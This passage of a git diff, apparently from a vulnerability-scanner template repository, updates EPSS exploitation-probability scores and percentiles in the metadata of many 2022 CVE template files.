cve-id: CVE-2022-1329 cwe-id: CWE-434,CWE-862 - epss-score: 0.96518 - epss-percentile: 0.99491 + epss-score: 0.96427 + epss-percentile: 0.99471 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index cb020cf53e..9ece5edfaf 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1386 cwe-id: CWE-918 - epss-score: 0.18525 - epss-percentile: 0.95708 + epss-score: 0.34969 + epss-percentile: 0.96732 cpe: cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index a025dc9cc5..721236a470 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1388 cwe-id: CWE-306 - epss-score: 0.97357 - epss-percentile: 0.99879 + epss-score: 0.97334 + epss-percentile: 0.99869 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index c34c377397..1729446899 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1390 cwe-id: CWE-22 - epss-score: 0.96256 - epss-percentile: 0.99396 + epss-score: 0.96052 + epss-percentile: 0.99362 cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index b40ec357ff..0842db9152 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1391 cwe-id: CWE-22 - epss-score: 0.02767 - epss-percentile: 0.89474 + epss-score: 0.03037 + epss-percentile: 0.89951 cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index 41229910c4..637383303c 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1392 cwe-id: CWE-22 - epss-score: 0.0183 - epss-percentile: 0.86866 + epss-score: 0.01867 + epss-percentile: 0.87073 cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index 5bb2b23557..e78ccd8400 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-1398 cwe-id: CWE-918 - epss-score: 0.00711 - epss-percentile: 0.78239 + epss-score: 0.00725 + epss-percentile: 0.78594 cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index f38d7dedc8..eba6494837 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1439 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index ec52c1ef39..7067b3e584 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1442 cwe-id: CWE-862 - epss-score: 0.04045 - epss-percentile: 0.91135 + epss-score: 0.04338 + epss-percentile: 0.91478 cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index bb8f8ab554..0f353c1581 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1574 cwe-id: CWE-352 - epss-score: 0.03275 - epss-percentile: 0.90244 + epss-score: 0.04337 + epss-percentile: 0.91477 cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index bd7429d21c..39158da9bf 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-1595 cwe-id: CWE-200 - epss-score: 0.00213 - epss-percentile: 0.59031 + epss-score: 0.0016 + epss-percentile: 0.52492 cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index fb2222f75c..9cf607975d 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1597 cwe-id: CWE-79 - epss-score: 0.0025 - epss-percentile: 0.62694 + epss-score: 0.00188 + epss-percentile: 0.56263 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index 9feda79683..eda6b6cacd 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-1598 cwe-id: CWE-306 - epss-score: 0.02063 - epss-percentile: 0.87789 + epss-score: 0.01562 + epss-percentile: 0.85821 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 92c67774b0..a259e56fbc 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1713 cwe-id: CWE-918 - epss-score: 0.01463 - epss-percentile: 0.85236 + epss-score: 0.0258 + epss-percentile: 0.89152 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index c05e8c9352..2896911643 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1724 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49645 + epss-score: 0.00106 + epss-percentile: 0.42838 cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index b39deaa667..42d78b51d4 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1756 cwe-id: CWE-79 - epss-score: 0.00117 - epss-percentile: 0.45342 + epss-score: 0.00088 + epss-percentile: 0.36947 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index 891b2da98f..ec86c7a27b 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1768 cwe-id: CWE-89 - epss-score: 0.75739 - epss-percentile: 0.97872 + epss-score: 0.74215 + epss-percentile: 0.97857 cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index cfa908d3cf..8cdf4995cb 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1815 - cwe-id: CWE-918,CWE-200 - epss-score: 0.01162 - epss-percentile: 0.83254 + cwe-id: CWE-200,CWE-918 + epss-score: 0.02327 + epss-percentile: 0.88615 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index 810d992441..610e84d65f 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-1883 cwe-id: CWE-89 - epss-score: 0.08572 - epss-percentile: 0.93838 + epss-score: 0.1005 + epss-percentile: 0.94357 cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index 34d0ccd9c9..21cb2489ed 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.1 cve-id: CVE-2022-1903 cwe-id: CWE-862 - epss-score: 0.40074 - epss-percentile: 0.969 + epss-score: 0.63489 + epss-percentile: 0.97571 cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index 1574c5b644..5b212d7015 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1904 cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.44948 + epss-score: 0.00099 + epss-percentile: 0.40609 cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index eecdef876c..91f6584955 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1906 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40141 + epss-score: 0.00115 + epss-percentile: 0.45053 cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 3d660f248b..f10ab76124 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1910 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45778 + epss-score: 0.00141 + epss-percentile: 0.49748 cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index 990651f4f4..d7b578ebd9 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1916 cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.44948 + epss-score: 0.00099 + epss-percentile: 0.40609 cpe: cpe:2.3:a:pluginus:active_products_tables_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index 6af3585cd7..05543869b8 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1933 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40069 + epss-score: 0.00115 + epss-percentile: 0.45053 cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index 14d8da8caa..bedf8ba025 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1937 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40069 + epss-score: 0.00115 + epss-percentile: 0.45053 cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 1a43f360ac..cccf10acfd 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1946 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40069 + epss-score: 0.00099 + epss-percentile: 0.40609 cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 349ad84745..27c3446a44 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1952 cwe-id: CWE-434 - epss-score: 0.94864 - epss-percentile: 0.99092 + epss-score: 0.94802 + epss-percentile: 0.99101 cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 4be7f004e7..d719937adf 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2034 cwe-id: CWE-639 - epss-score: 0.00576 - epss-percentile: 0.75496 + epss-score: 0.00473 + epss-percentile: 0.73045 cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index f67d8ec0ca..3bd7767f50 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-21371 cwe-id: CWE-22 epss-score: 0.96287 - epss-percentile: 0.9941 + epss-percentile: 0.99425 cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 5b69b7708a..9758a86b12 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-21500 - epss-score: 0.23922 - epss-percentile: 0.96134 + epss-score: 0.24528 + epss-percentile: 0.96196 cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index fcc5ea8f71..f256838420 100644 --- a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-21587 cwe-id: CWE-306 - epss-score: 0.96505 - epss-percentile: 0.99484 + epss-score: 0.96418 + epss-percentile: 0.99469 cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index ae320cd39a..2ea66f3919 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21661 cwe-id: CWE-89 - epss-score: 0.93732 - epss-percentile: 0.9891 + epss-score: 0.94068 + epss-percentile: 0.98979 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index 99ac01b5df..7777f262e2 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-21705 cwe-id: CWE-74,NVD-CWE-Other epss-score: 0.00522 - epss-percentile: 0.74218 + epss-percentile: 0.74345 cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 6c941af925..f031f9b398 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2174 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.48149 + epss-score: 0.001 + epss-percentile: 0.40832 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index aceb2d8a79..da6900fc6e 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-2185 cwe-id: CWE-78 epss-score: 0.50111 - epss-percentile: 0.97213 + epss-percentile: 0.9723 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index 961ce7b9ff..95cc1f4e7a 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2187 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45778 + epss-score: 0.00141 + epss-percentile: 0.49748 cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index 0fc763a9ef..03fbc18388 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-2219 cwe-id: CWE-79 - epss-score: 0.00179 - epss-percentile: 0.54947 + epss-score: 0.00212 + epss-percentile: 0.5901 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 84b29960c5..badb73bae1 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-22242 cwe-id: CWE-79 epss-score: 0.04391 - epss-percentile: 0.91461 + epss-percentile: 0.91523 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index c92bac63b8..ab8b918974 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-22536 cwe-id: CWE-444 epss-score: 0.95701 - epss-percentile: 0.99262 + epss-percentile: 0.99283 cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index 932a9b51ac..b07317b8fe 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 - epss-score: 0.14423 - epss-percentile: 0.95186 + epss-score: 0.15006 + epss-percentile: 0.95289 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 2c3e14e9d0..ccd46ea29b 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-22897 cwe-id: CWE-89 epss-score: 0.04685 - epss-percentile: 0.91731 + epss-percentile: 0.91794 cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index 01365d249b..56491aebbf 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2290 cwe-id: CWE-79 - epss-score: 0.00112 - epss-percentile: 0.44414 + epss-score: 0.00115 + epss-percentile: 0.44926 cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index 7b79655a9f..dc62f5aaaa 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2022-22947 cwe-id: CWE-917,CWE-94 - epss-score: 0.97487 - epss-percentile: 0.99969 + epss-score: 0.97494 + epss-percentile: 0.99975 cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 4fdfcef06f..ddaa50f0ff 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22954 cwe-id: CWE-94 - epss-score: 0.97361 - epss-percentile: 0.99881 + epss-score: 0.97348 + epss-percentile: 0.99878 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 4ce35cba09..9bce75dcb1 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22963 cwe-id: CWE-917,CWE-94 - epss-score: 0.97523 - epss-percentile: 0.99988 + epss-score: 0.97528 + epss-percentile: 0.99991 cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index ad491de065..6c6756b2fe 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22965 cwe-id: CWE-94 - epss-score: 0.97451 - epss-percentile: 0.99948 + epss-score: 0.97424 + epss-percentile: 0.99927 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 9f5d02bc65..e0b3405d4b 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 - epss-score: 0.71777 - epss-percentile: 0.97756 + epss-score: 0.7146 + epss-percentile: 0.9778 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 5ce305e24f..760ead0a50 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-23102 cwe-id: CWE-601 epss-score: 0.00366 - epss-percentile: 0.69396 + epss-percentile: 0.69547 cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index cb794597c4..6bc4285e59 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23131 cwe-id: CWE-290 - epss-score: 0.96928 - epss-percentile: 0.99654 + epss-score: 0.96952 + epss-percentile: 0.9967 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index d4df52eec6..1b5e5c98a0 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23134 cwe-id: CWE-287,CWE-284 - epss-score: 0.20248 - epss-percentile: 0.95857 + epss-score: 0.35332 + epss-percentile: 0.96746 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 266df0ae38..06a373204b 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2314 cwe-id: CWE-78,NVD-CWE-noinfo - epss-score: 0.25245 - epss-percentile: 0.96214 + epss-score: 0.29554 + epss-percentile: 0.96472 cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index 4fb4cc0cb9..b68cea2ee1 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-23178 cwe-id: CWE-287 epss-score: 0.03228 - epss-percentile: 0.9018 + epss-percentile: 0.90237 cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index d506effc72..74b70995c0 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-23347 cwe-id: CWE-22 - 